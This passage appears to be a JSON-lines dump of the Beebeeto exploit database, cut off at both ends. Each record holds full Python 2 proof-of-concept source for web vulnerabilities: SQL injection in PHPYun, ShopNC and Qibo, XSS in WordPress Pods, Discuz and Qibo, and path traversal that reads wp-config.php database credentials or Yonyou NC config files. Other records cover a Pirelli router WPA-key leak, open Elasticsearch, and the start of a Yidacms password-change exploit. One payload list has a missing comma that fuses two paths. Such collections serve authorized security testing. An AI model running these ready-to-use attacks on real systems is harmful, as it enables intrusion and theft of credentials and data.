verify(cls, args):\r\n target = urlparse.urlparse(args['options']['target'])\r\n verify_url = '%s://%s:9200/_nodes/stats' % (target.scheme, target.netloc)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n content = requests.get(verify_url, timeout=5).text\r\n 
except:\r\n content = ''\r\n if 'cluster_name' in content and 'transport_address\":' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u9ed8\u8ba4\u60c5\u51b5\uff0cElasticsearch\u5f00\u542f\u540e\u4f1a\u76d1\u542c9200\u7aef\u53e3\u53ef\u4ee5\u5728\u672a\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u8bbf\u95ee\uff0c\u4ece\u800c\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f", "app_name": "ElasticSearch", "id": "poc-2015-0014", "layer4_protocol": null}
{"create_date": "2015-01-16 22:48:36", "name": "PHPYun 3.1 /wap/member/model/index.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "PHPYun\u6f0f\u6d1e,/wap/member/model/index.class.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.forgeheaders import ForgeHeaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0012',\r\n 'name': 'PHPYun 3.1 /wap/member/model/index.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-01-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPYun',\r\n 'vul_version': ['3.1'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['PHPYun\u6f0f\u6d1e', '/wap/member/model/index.class.php', 'php'],\r\n 'desc': '/wap/member/model/index.class.php \u8fc7\u6ee4\u4e0d\u4e25\u8c28',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-071296',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n fake_headers = ForgeHeaders().get_headers()\r\n fake_headers['User-Agent'] = \"iPhone6\"\r\n check_url = '%s/index.php?m=resume&id=999999' % args['options']['target']\r\n verify_url = '%s/wap/member/index.php?m=index&c=saveresume' % args['options']['target']\r\n data = 'table=expect%60%20%28id%2Cuid%2Cname%29%20values%20%28' \\\r\n '999999%2C1%2C%28md5%280x23333333%29%29%29%23&subm' \\\r\n 'it=111&eid=1'\r\n req = urllib2.Request(verify_url, data=data, headers=fake_headers)\r\n 
urllib2.urlopen(req)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(check_url).read()\r\n if '2eb120797101bb291fd4a6764' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['post_data'] = data\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "/wap/member/model/index.class.php \u8fc7\u6ee4\u4e0d\u4e25\u8c28", "app_name": "phpyun", "id": "poc-2015-0012", "layer4_protocol": null}
{"create_date": "2015-01-16 11:50:01", "name": "Wordpress Plugin Pods <= 2.4.3 XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u585e\u4e07\u94c1\u725b", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Wordpress\u6f0f\u6d1e,Pods plugin\u6f0f\u6d1e,/wp-admin/admin.php,php,CVE-2014-7956", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0010',\r\n 'name': 'Wordpress Plugin Pods <= 2.4.3 XSS\u6f0f\u6d1e POC',\r\n 'author': '\u585e\u4e07\u94c1\u725b',\r\n 'create_date': '2015-01-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wordpress with Pods plugin',\r\n 'vul_version': ['<=2.4.3'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Wordpress\u6f0f\u6d1e', 'Pods plugin\u6f0f\u6d1e', '/wp-admin/admin.php', 'php', 'CVE-2014-7956'],\r\n 'desc': '''\r\n Wordpress:\u5c0f\u4e8e2.4\u7248\u672c\u7684Pods\u63d2\u4ef6\u4e2d<a>\u6807\u8bb0\u672a\u95ed\u5408\uff0c\u5bfc\u81f4HTTP GET\u53c2\u6570\u6570\u636e\u4e2d\uff0c\u53ef\u4ee5\u4ea7\u751f\u53cd\u5c04\u578b\u7684xss\u6f0f\u6d1e\u3002\r\n ''',\r\n 'references': ['http://www.securityfocus.com/archive/1/534437',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/wp-admin/admin.php?page=pods&action=edit&id=4\"></a><script>alert(1)</script><!--'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = 
urllib2.urlopen(req).read()\r\n if '<script>alert(1)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Wordpress:\u5c0f\u4e8e2.4\u7248\u672c\u7684Pods\u63d2\u4ef6\u4e2d<a>\u6807\u8bb0\u672a\u95ed\u5408\uff0c\u5bfc\u81f4HTTP GET\u53c2\u6570\u6570\u636e\u4e2d\uff0c\u53ef\u4ee5\u4ea7\u751f\u53cd\u5c04\u578b\u7684xss\u6f0f\u6d1e\u3002", "app_name": "WordPress", "id": "poc-2015-0010", "layer4_protocol": null}
{"create_date": "2015-01-15 14:20:07", "name": "\u7528\u53cbNC /hrss/ELTextFile.load.d \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u7528\u53cb\u6f0f\u6d1e,Yonyou\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,/hrss/ELTextFile.load.d", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0008',\r\n 'name': '\u7528\u53cbNC /hrss/ELTextFile.load.d \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2015-01-14',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u7528\u6709',\r\n 'vul_version': ['NC'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['\u7528\u53cb\u6f0f\u6d1e', 'Yonyou\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', '/hrss/ELTextFile.load.d'],\r\n 'desc': '../../ierp/bin/prop.xml',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-066512',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = '%s/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml' % args['options']['target']\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if 'enableHotDeploy' in content and 'internalServiceArray' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from 
pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "../../ierp/bin/prop.xml", "app_name": "\u7528\u53cb\uff08Yonyou\uff09", "id": "poc-2015-0008", "layer4_protocol": null}
{"create_date": "2015-01-14 17:28:57", "name": "ShopNc v6.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "ShopNc\u6f0f\u6d1e,ShopNcSQL\u6ce8\u5165\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.forgeheaders import ForgeHeaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0007',\r\n 'name': 'ShopNc v6.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2015-01-14',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ShopNc',\r\n 'vul_version': ['6.0'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['ShopNc\u6f0f\u6d1e', 'ShopNcSQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php', 'php'],\r\n 'desc': '''\r\n Site footer:\r\n ShopNC\u00ae*******\u79d1\u6280\u6709\u9650\u516c\u53f8\r\n Copyright\u00a9 2007-2009 ShopNC, Powered by ShopNC Team\r\n ''',\r\n 'references': ['http://0day5.com/archives/1218',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n fake_headers = ForgeHeaders().get_headers()\r\n fake_headers['Referer'] = (\"http://baidu.com'and(select 1 from(select count(*),concat(\"\r\n \"floor(rand(0)*2),0x3a,(select(select(SELECT md5(233333)))\"\r\n \"from information_schema.tables limit 0,1))x from information_schema\"\r\n \".tables group by x)a) and 1=1)#\")\r\n verify_url = args['options']['target']\r\n req = urllib2.Request(verify_url, headers=fake_headers)\r\n content = 
urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if 'fb0b32aeafac4591c7ae6d5e58308344' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['headers_referer'] = fake_headers['Referer']\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Site footer:\r\n ShopNC\u00ae*******\u79d1\u6280\u6709\u9650\u516c\u53f8\r\n Copyright\u00a9 2007-2009 ShopNC, Powered by ShopNC Team", "app_name": "ShopNC", "id": "poc-2015-0007", "layer4_protocol": null}
{"create_date": "2015-01-08 01:40:01", "name": "Pirelli ADSL2/2+ Wireless Router P.DGA4001N \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Pirelli\u8def\u7531\u6f0f\u6d1e,Pirelli\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,/wlsecurity.html", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0004',\r\n 'name': 'Pirelli ADSL2/2+ Wireless Router P.DGA4001N \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-01-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Pirelli',\r\n 'vul_version': ['ADSL2/2+'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Pirelli\u8def\u7531\u6f0f\u6d1e', 'Pirelli\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', '/wlsecurity.html'],\r\n 'desc': 'Tested on firmware version PDG_TEF_SP_4.06L.6',\r\n 'references': ['http://www.exploit-db.com/exploits/35721/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = \"%s/wlsecurity.html\" % args['options']['target']\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"var wpaPskKey = '\" in content or \"var sessionKey\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import 
pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Tested on firmware version PDG_TEF_SP_4.06L.6", "app_name": "Other", "id": "poc-2015-0004", "layer4_protocol": null}
{"create_date": "2015-01-04 16:09:57", "name": "\u9f50\u535a\u5730\u65b9\u95e8\u6237\u7cfb\u7edf /coupon/s.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tomato", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u9f50\u535a\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/coupon/s.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0002',\r\n 'name': '\u9f50\u535a\u5730\u65b9\u95e8\u6237\u7cfb\u7edf /coupon/s.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'Tomato',\r\n 'create_date': '2015-01-02',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Qibo',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u9f50\u535a\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/coupon/s.php', 'php'],\r\n 'desc': '\u95ee\u9898\u51fa\u5728\u9f50\u535a\u641c\u7d22\u7684\u4f4d\u7f6e\uff0c\u4e5f\u5c31\u662f\uff1ahttp://life.qibosoft.com/coupon/s.php',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-079938',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/coupon/s.php?action=search&keyword=11&fid=1&fids[]=0)%20union%20select%20md5(1),2,3,4,5,6,7,8,9%23\"\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"c4ca4238a0b923820dcc509a6f75849b\" in content:\r\n args['success'] = True\r\n 
args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u95ee\u9898\u51fa\u5728\u9f50\u535a\u641c\u7d22\u7684\u4f4d\u7f6e\uff0c\u4e5f\u5c31\u662f\uff1ahttp://life.qibosoft.com/coupon/s.php", "app_name": "qibocms", "id": "poc-2015-0002", "layer4_protocol": null}
{"create_date": "2015-01-01 00:37:47", "name": "Discuz! 7.2 /admincp.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/admincp.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0001',\r\n 'name': 'Discuz! 7.2 /admincp.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-31',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['7.2'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Discuz\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/admincp.php', 'php'],\r\n 'desc': 'Cross site scripting has benn found on /admincp.php file.',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-084097',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/admincp.php?infloat=yes&handlekey=123);alert(/bb2/);//\"\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"if($('return_123);alert(/bb2/);//'\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Cross site scripting has benn found 
on /admincp.php file.", "app_name": "Discuz", "id": "poc-2015-0001", "layer4_protocol": null}
{"create_date": "2014-12-29 16:47:00", "name": "WordPress Multiple themes /download.php Arbitrary File Download POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Lyleaks", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress\u63d2\u4ef6\u6f0f\u6d1e,Themes,Arbitrary File Download,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0222',\r\n 'name': 'WordPress Multiple themes /download.php Arbitrary File Download POC',\r\n 'author': 'Lyleaks',\r\n 'create_date': '2014-12-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wordpress',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['Wordpress\u63d2\u4ef6\u6f0f\u6d1e', 'Themes', 'Arbitrary File Download', 'php'],\r\n 'desc': '\"download_file\" variable is not sanitized.',\r\n 'references': ['http://packetstormsecurity.com/files/129706/wptheme-download.txt',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = [\r\n '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',\r\n '/wp-content/force-download.php?file=../wp-config.php',\r\n '/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php',\r\n '/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php',\r\n '/wp-content/themes/markant/download.php?file=../../wp-config.php',\r\n '/wp-content/themes/yakimabait/download.php?file=./wp-config.php',\r\n 
'/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php',\r\n '/wp-content/themes/felis/download.php?file=../wp-config.php',\r\n '/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php',\r\n '/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php'\r\n '/wp-content/themes/epic/includes/download.php?file=wp-config.php',\r\n '/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php',\r\n '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php',\r\n '/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php',\r\n '/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php',\r\n '/wp-content/themes/lote27/download.php?download=../../../wp-config.php',\r\n '/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php',\r\n '/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php',\r\n '/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'\r\n ]\r\n args['poc_ret']['file_path'] = []\r\n for filename in payload:\r\n verify_url = args['options']['target'] + filename\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n except:\r\n continue\r\n if 'DB_PASSWORD' in content and 'DB_USER' in content:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\"download_file\" variable is not sanitized.", "app_name": "WordPress", "id": "poc-2014-0222", "layer4_protocol": null}
{"create_date": "2014-12-27 16:03:46", "name": "Qibo Information V1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Qibo\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/search.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0219',\r\n 'name': 'Qibo Information V1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'user1018',\r\n 'create_date': '2014-12-27',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Qibo',\r\n 'vul_version': ['v1'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Qibo\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/search.php', 'php'],\r\n 'desc': '''\r\n \u7531\u4e8e\u5168\u5c40\u53d8\u91cf\u53ef\u63a7\uff0c\u901a\u8fc7\u63a7\u5236\u53d8\u91cf\u53ef\u4ee5\u8fdb\u884c\u53cd\u5c04\u578b XSS\u3002\r\n ''',\r\n 'references': ['N/A'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/search.php?module_db[]=<iframe/onload=alert(bb2)><!--'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<iframe/onload=alert(bb2)><!--' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n 
mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u7531\u4e8e\u5168\u5c40\u53d8\u91cf\u53ef\u63a7\uff0c\u901a\u8fc7\u63a7\u5236\u53d8\u91cf\u53ef\u4ee5\u8fdb\u884c\u53cd\u5c04\u578b XSS\u3002", "app_name": "qibocms", "id": "poc-2014-0219", "layer4_protocol": null}
{"create_date": "2014-12-27 15:40:05", "name": "Yidacms v3.2 /Yidacms/user/user.asp \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "user1018", "rank": 4, "port": null, "vul_type": "\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539", "tag": "Yidacms\u6f0f\u6d1e,Yidacms\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport requests\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0217',\r\n 'name': 'Yidacms v3.2 /Yidacms/user/user.asp \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e Exploit',\r\n 'author': 'user1018',\r\n 'create_date': '2014-12-27',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Yidacms',\r\n 'vul_version': ['3.2'],\r\n 'type': 'Remote Password Change',\r\n 'tag': ['Yidacms\u6f0f\u6d1e', 